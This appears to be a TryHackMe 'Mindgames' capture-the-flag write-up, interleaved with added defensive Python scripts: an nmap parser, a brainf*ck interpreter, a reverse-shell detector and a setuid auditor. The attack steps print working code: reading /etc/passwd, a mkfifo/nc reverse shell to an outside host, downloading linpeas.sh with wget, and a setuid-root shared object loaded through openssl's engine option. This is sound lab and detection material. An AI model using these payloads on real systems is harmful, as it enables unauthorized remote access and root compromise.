TryHackMe | Mindgames

Reconnaissance

First things first, we run a simple nmap scan to see which ports are open and which services are running on them.

nmap -sC -sV -O -oA simple_scan 10.10.229.21
  • -sC: run default nmap scripts
  • -sV: detect service version
  • -O: detect OS
  • -oA: output all formats and store in file named simple_scan
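Because -oA also writes a greppable (.gnmap) file, the scan result can be parsed and compared against an expected baseline of open ports. The following Python script is an added example, not part of the original write-up; the scan lines it parses are constructed sample data (the version strings are made up), and the baseline dictionary is an assumption used only to show the comparison.

```python
"""Parse nmap greppable (-oG / -oA *.gnmap) output and flag unexpected open ports.

Added example; the sample scan text below is constructed, not real output
from the target in the write-up.
"""

# Constructed sample: nmap writes one "Ports:" line per host, fields separated
# by tabs, port entries separated by ", ", each entry
# port/state/proto/owner/service/rpc-info/version/
SAMPLE_GNMAP = "\n".join([
    "# Nmap 7.80 scan initiated as: nmap -sC -sV -O -oA simple_scan 10.10.229.21",
    "Host: 10.10.229.21 ()\tStatus: Up",
    "Host: 10.10.229.21 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.6p1 (constructed)/, "
    "80/open/tcp//http//Apache httpd 2.4.29 (constructed)/, "
    "8080/filtered/tcp//http-proxy///\tIgnored State: closed (997)",
    "# Nmap done at ... -- 1 IP address (1 host up) scanned",
])


def parse_gnmap(text):
    """Return {host_addr: [port_record, ...]} for every 'Ports:' line.

    nmap replaces '/' inside service/version strings in this format, so a
    plain split on '/' is safe for the seven fixed fields.
    """
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        fields = line.split("\t")
        addr = fields[0].split()[1]
        ports_field = next(f for f in fields if f.startswith("Ports:"))
        entries = ports_field[len("Ports:"):].strip().split(", ")
        for entry in entries:
            parts = entry.split("/")
            if len(parts) < 7:
                continue  # malformed entry; skip rather than guess
            port, state, proto, _owner, service, _rpc, version = parts[:7]
            hosts.setdefault(addr, []).append({
                "port": int(port),
                "state": state,
                "proto": proto,
                "service": service,
                "version": version,
            })
    return hosts


def open_ports(hosts, addr):
    """Sorted list of TCP/UDP ports reported as 'open' for one host."""
    return sorted(r["port"] for r in hosts.get(addr, []) if r["state"] == "open")


def unexpected_open_ports(hosts, baseline):
    """Compare open ports per host with an allow-list; return {addr: set(extra ports)}.

    `baseline` is {addr: set(expected_ports)}; a host missing from the
    baseline is treated as having no expected ports.
    """
    findings = {}
    for addr in hosts:
        extra = set(open_ports(hosts, addr)) - baseline.get(addr, set())
        if extra:
            findings[addr] = extra
    return findings


if __name__ == "__main__":
    parsed = parse_gnmap(SAMPLE_GNMAP)
    # Assumed baseline: only SSH is expected on this host.
    print(unexpected_open_ports(parsed, {"10.10.229.21": {22}}))
```

Running the script on a real simple_scan.gnmap file only requires replacing SAMPLE_GNMAP with the file contents; the baseline is whatever the asset inventory says should be listening.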

Enumeration

Opening the website in a browser, the first thing I see is brainf*ck text.
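Brainf*ck is a tiny eight-instruction language, so decoding text like this does not need an online tool. The interpreter below is an added example, not code from the write-up; it implements the standard semantics (byte cells wrapping at 256, matching brackets as loops) and refuses to run programs with unbalanced brackets or that exceed a step limit, which matters when you feed it untrusted input from a web page.

```python
"""Minimal brainf*ck interpreter (added example, not from the original write-up)."""


def run_brainfuck(program, stdin="", tape_size=30000, max_steps=10_000_000):
    """Execute `program` and return its output as a string.

    stdin  : characters consumed by ','; EOF leaves the cell unchanged.
    max_steps: guard so a malicious or buggy program cannot spin forever.
    """
    # Pre-compute matching bracket positions so loops are O(1) jumps.
    jumps, stack = {}, []
    for i, ch in enumerate(program):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")

    tape = bytearray(tape_size)
    ptr = pc = inp = steps = 0
    out = []
    while pc < len(program):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded")
        c = program[pc]
        if c == ">":
            ptr += 1
            if ptr >= tape_size:
                raise IndexError("tape pointer ran off the right end")
        elif c == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("tape pointer ran off the left end")
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif c == ",":
            if inp < len(stdin):
                tape[ptr] = ord(stdin[inp]) & 0xFF
                inp += 1
        elif c == "[" and tape[ptr] == 0:
            pc = jumps[pc]
        elif c == "]" and tape[ptr] != 0:
            pc = jumps[pc]
        # any other character is a comment and is ignored
        pc += 1
    return "".join(out)


# Constructed sample: the classic "Hello World!" program, used only as a self-check.
HELLO = ("++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]>>.>---.+++++++.."
         "+++.>>.<-.<.+++.------.--------.>>+.>++.")

if __name__ == "__main__":
    print(run_brainfuck(HELLO), end="")
```

Paste the text taken from the page into `run_brainfuck` to recover whatever message it encodes; the interpreter treats every character other than the eight instructions as a comment, so surrounding HTML noise does not have to be stripped first.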

f = open("/etc/passwd", "r")
print(f.read())

import os
os.system('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.8.13.70 7896 > /tmp/f')

python3 -c 'import pty;pty.spawn("/bin/bash")'
cat user.txt
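The named-pipe reverse shell and the pty upgrade above leave a very recognisable command-line footprint in process execution logs. The script below is an added example (not from the write-up) of detection logic a blue team could run over execve or auditd-style command lines; the log lines it scans are constructed, and the remote address in them is a placeholder from the documentation range.

```python
"""Flag reverse-shell indicators in process command lines (added example)."""
import re

# Each indicator is a regular expression over the full command line.
INDICATORS = {
    # mkfifo followed later by a pipe into an interactive shell
    "named_pipe_shell": re.compile(r"mkfifo\s+\S+.*\|\s*/bin/(?:ba)?sh\s+-i"),
    # nc / ncat connecting out to an IPv4 address and port
    "netcat_to_remote": re.compile(r"\bnc(?:at)?\b.*\b\d{1,3}(?:\.\d{1,3}){3}\s+\d{1,5}\b"),
    # bash's /dev/tcp pseudo-device
    "dev_tcp_redirect": re.compile(r"/dev/tcp/"),
    # Python pty.spawn used to upgrade a dumb shell
    "pty_spawn": re.compile(r"pty\.spawn\("),
    # interactive shell with stderr merged into stdout
    "interactive_shell_redirect": re.compile(r"/bin/(?:ba)?sh\s+-i\s+2>&1"),
}


def classify_command(cmdline):
    """Return the set of indicator names that match one command line."""
    return {name for name, rx in INDICATORS.items() if rx.search(cmdline)}


def scan_events(lines):
    """Return [(line, sorted indicator names)] for every line that matched."""
    findings = []
    for line in lines:
        hits = classify_command(line)
        if hits:
            findings.append((line, sorted(hits)))
    return findings


# Constructed sample events; 192.0.2.10 is a documentation-range placeholder.
SAMPLE_EVENTS = [
    "uid=33 comm=sh cmd=rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.0.2.10 7896 > /tmp/f",
    "uid=33 comm=python3 cmd=python3 -c 'import pty;pty.spawn(\"/bin/bash\")'",
    "uid=1000 comm=ls cmd=ls -la /var/www/html",
    "uid=1000 comm=cat cmd=cat /tmp/f",
]

if __name__ == "__main__":
    for line, hits in scan_events(SAMPLE_EVENTS):
        print(hits, "<-", line)
```

The patterns are deliberately narrow so they can be used as a starting point for an alert rather than a noisy heuristic; a pipe into `/bin/sh -i` plus an outbound `nc` on the same command line is rarely legitimate on a web server.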

Privilege Escalation

Now that we have a stable shell, let's proceed with privilege escalation. First things first, let's transfer linpeas.sh to the target machine. To do this we first have to host linpeas.sh on a web server; I am using the 'SimpleHTTPServer' module to serve it from our local machine and wget on the target machine to download it. Give the file execute permission and run it.

python -m SimpleHTTPServer 8080
wget http://10.8.13.70:8080/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

#include <unistd.h>

/* Runs automatically when the shared object is loaded by the host process. */
__attribute__((constructor))
static void init() {
    setuid(0);
    execl("/bin/sh", "sh", NULL);
}

gcc -fPIC -o openssl.o -c openssl.c
gcc -shared -o openssl.so -lcrypto openssl.o

wget http://10.8.13.70:8080/openssl.so
chmod +x openssl.so
openssl req -engine ./openssl.so
cat /root/root.txt
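The shared object above only works because the openssl binary on the target can change its user id, and the -engine option lets it load arbitrary user-supplied code. From a hardening standpoint the question is which executables on a host carry setuid/setgid bits, which is one of the checks linpeas performs. The following Python script is an added example, not from the write-up: it walks a directory tree and reports regular files with the setuid or setgid bit set. The directory it scans is a parameter; file capabilities (what `getcap -r /` reports) are a separate mechanism that this script does not cover.

```python
"""List setuid/setgid executables under a directory tree (added example)."""
import os
import stat


def is_privileged_mode(mode):
    """True for a regular file whose mode has the setuid or setgid bit."""
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))


def find_privileged_binaries(root):
    """Return sorted [(path, octal_mode, owner_uid)] for setuid/setgid regular files.

    Symlinks are not followed (lstat), so a link to a privileged binary is
    not reported twice and link loops cannot stall the walk.
    """
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable; skip rather than abort the audit
            if is_privileged_mode(st.st_mode):
                hits.append((path, oct(st.st_mode & 0o7777), st.st_uid))
    return sorted(hits)


def describe(hits):
    """Human-readable lines, flagging root-owned setuid files explicitly."""
    lines = []
    for path, mode, uid in hits:
        tag = "ROOT-SETUID" if uid == 0 and int(mode, 8) & stat.S_ISUID else "privileged"
        lines.append(f"{tag:12} {mode} uid={uid} {path}")
    return lines


if __name__ == "__main__":
    import sys
    # Assumed usage: python3 audit_setuid.py /usr  (scan root defaults to /usr)
    scan_root = sys.argv[1] if len(sys.argv) > 1 else "/usr"
    for line in describe(find_privileged_binaries(scan_root)):
        print(line)
```

Comparing the output against a known-good image of the same host is the useful step: a setuid bit that appears on a binary such as openssl, which does not need one, is exactly the kind of anomaly that turns a web-shell foothold into root.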
